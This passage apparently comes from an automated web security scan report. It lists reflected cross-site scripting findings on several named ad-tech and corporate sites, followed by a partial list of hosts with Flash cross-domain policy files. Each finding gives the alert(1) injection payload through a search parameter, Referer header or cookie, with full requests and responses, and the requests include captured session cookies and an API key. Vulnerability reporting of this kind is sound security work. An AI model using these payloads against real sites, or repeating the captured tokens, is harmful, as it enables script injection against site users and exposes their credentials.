The value of the search request parameter is copied into the name of an HTML tag attribute. The payload 71cf5%20style%3dx%3aexpression(alert(1))%20041bb562a4a was submitted in the search parameter. This input was echoed as 71cf5 style=x:expression(alert(1)) 041bb562a4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /en-us/search.html?search=xss%20contact%20faq%20phone71cf5%20style%3dx%3aexpression(alert(1))%20041bb562a4a HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/search.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.3.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; locale=en-us

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:49 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a title'Next' href=/en-us/search.html?search=xss contact faq phone71cf5 style=x:expression(alert(1)) 041bb562a4a&PageIndex=2>
...[SNIP]...

3.92. http://api.bizographics.com/v1/profile.json [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c9c69<script>alert(1)</script>856d1048244 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: c9c69<script>alert(1)</script>856d1048244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:18 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: c9c69<script>alert(1)</script>856d1048244

3.93. http://pixel.adsafeprotected.com/jspix [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e053a"-alert(1)-"60aad715d99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jspix?anId=144&pubId=4749&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e053a"-alert(1)-"60aad715d99
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A5B13C6DD2625ADC8DB86B9CC1C99F3C; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=e053a"-alert(1)-"60aad715d99",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000"
...[SNIP]...

3.94. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 685de"-alert(1)-"60e51d37b2a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=685de"-alert(1)-"60e51d37b2a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 15:57:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^260; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61369; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=1300434.js^5^1315321030^1315321030&1295121.js^3^1315321030^1315321030&2553663.js^5^1315321026^1315321026&1295156.js^3^1315320939^1315321026&638177.js^2^1315313132^-1612641032; expires=Tue, 13-Sep-2011 14:57:10 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1842

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1300434"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=685de"-alert(1)-"60e51d37b2a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.95. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dcb9"-alert(1)-"3db46c88d9f was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=1dcb9"-alert(1)-"3db46c88d9f; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:46 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:46 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 15:57:46 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^231c9a%00%0d%0a98f953b2934&11953^5; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61333; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=1300433.js^18^1315321062^1315321066&1295118.js^3^1315321062^1315321062&2553662.js^5^1315321061^1315321061&1295153.js^3^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^-1612640932; expires=Tue, 13-Sep-2011 14:57:46 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1842

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1300433"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=1dcb9"-alert(1)-"3db46c88d9f\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.96. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67a75"><script>alert(1)</script>5b71f4343a7 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=67a75"><script>alert(1)</script>5b71f4343a7; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=60; expires=Tue, 06-Sep-2011 15:59:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^744f40729e51a8caac2210640; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61249; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1785

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=67a75"><script>alert(1)</script>5b71f4343a7" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

3.97. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e19"-alert(1)-"aad8da393bf was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=f1e19"-alert(1)-"aad8da393bf; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:16:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 16:16:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=60; expires=Tue, 06-Sep-2011 16:16:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^1044f407298942487860d6b793; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60237; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1716

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3158455"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=f1e19"-alert(1)-"aad8da393bf\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.98. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload 5b8f5<script>alert(1)</script>aa3aff42c32 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:11:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:11:28 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]"}});

3.99. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_nr cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The value of the s_nr cookie is copied into the HTML document as plain text between tags. The payload 60d58<script>alert(1)</script>39205ed221 was submitted in the s_nr cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=131344646830060d58<script>alert(1)</script>39205ed221; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA_CP15 (build: CVSTag=https://svn.jboss.org/repos/jbossas/tags/JBoss_4_0_5_GA_CP15 date=200901081058)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:01:00 GMT
Content-Length: 207
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"131344646830060d58<script>alert(1)</script>39205ed221","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

3.100. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The value of the s_vi cookie is copied into the HTML document as plain text between tags. The payload 1a3d0<script>alert(1)</script>a48e60d2b0a was submitted in the s_vi cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]1a3d0<script>alert(1)</script>a48e60d2b0a

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:53 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:01:03 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]1a3d0<script>alert(1)</script>a48e60d2b0a"}});

4. Flash cross-domain policy previous next
There are 135 instances of this issue:

http://a.tribalfusion.com/crossdomain.xml
http://a1.interclick.com/crossdomain.xml
http://action.mathtag.com/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://admin.brightcove.com/crossdomain.xml
http://ads.pointroll.com/crossdomain.xml
http://ads.rnmd.net/crossdomain.xml
http://afe.specificclick.net/crossdomain.xml
http://ajax.googleapis.com/crossdomain.xml
http://altfarm.mediaplex.com/crossdomain.xml
http://at.amgdgt.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://c.betrad.com/crossdomain.xml
http://c.brightcove.com/crossdomain.xml
http://cache.specificmedia.com/crossdomain.xml
http://cdn.gigya.com/crossdomain.xml
http://cdn5.tribalfusion.com/crossdomain.xml
http://clk.fetchback.com/crossdomain.xml
http://content.links.channelintelligence.com/crossdomain.xml
http://content.plymedia.com/crossdomain.xml
http://core.insightexpressai.com/crossdomain.xml
http://d.adroll.com/crossdomain.xml
http://d.ads.readwriteweb.com/crossdomain.xml
http://d1.openx.org/crossdomain.xml
http://d7.zedo.com/crossdomain.xml
http://fls.doubleclick.net/crossdomain.xml
http://goku.brightcove.com/crossdomain.xml
http://gscounters.gigya.com/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://img-cdn.mediaplex.com/crossdomain.xml
http://imp.fetchback.com/crossdomain.xml
http://intelligence.marykay.com/crossdomain.xml
http://js.revsci.net/crossdomain.xml
http://l.betrad.com/crossdomain.xml
http://load.tubemogul.com/crossdomain.xml
http://log30.doubleverify.com/crossdomain.xml
http://netsuite.tt.omtrdc.net/crossdomain.xml
http://network.realmedia.com/crossdomain.xml
http://now.eloqua.com/crossdomain.xml
http://oimg.m.cnbc.com/crossdomain.xml
http://oimg.nbcuni.com/crossdomain.xml
http://omni.csc.com/crossdomain.xml
http://oracle.112.2o7.net/crossdomain.xml
http://oracleglobal.112.2o7.net/crossdomain.xml
http://oracleuniversity.112.2o7.net/crossdomain.xml
http://p.brilig.com/crossdomain.xml
http://pg.links.channelintelligence.com/crossdomain.xml
http://pg.links.origin.channelintelligence.com/crossdomain.xml
http://ping.crowdscience.com/crossdomain.xml
http://pix04.revsci.net/crossdomain.xml
http://pixel.adsafeprotected.com/crossdomain.xml
http://pixel.everesttech.net/crossdomain.xml
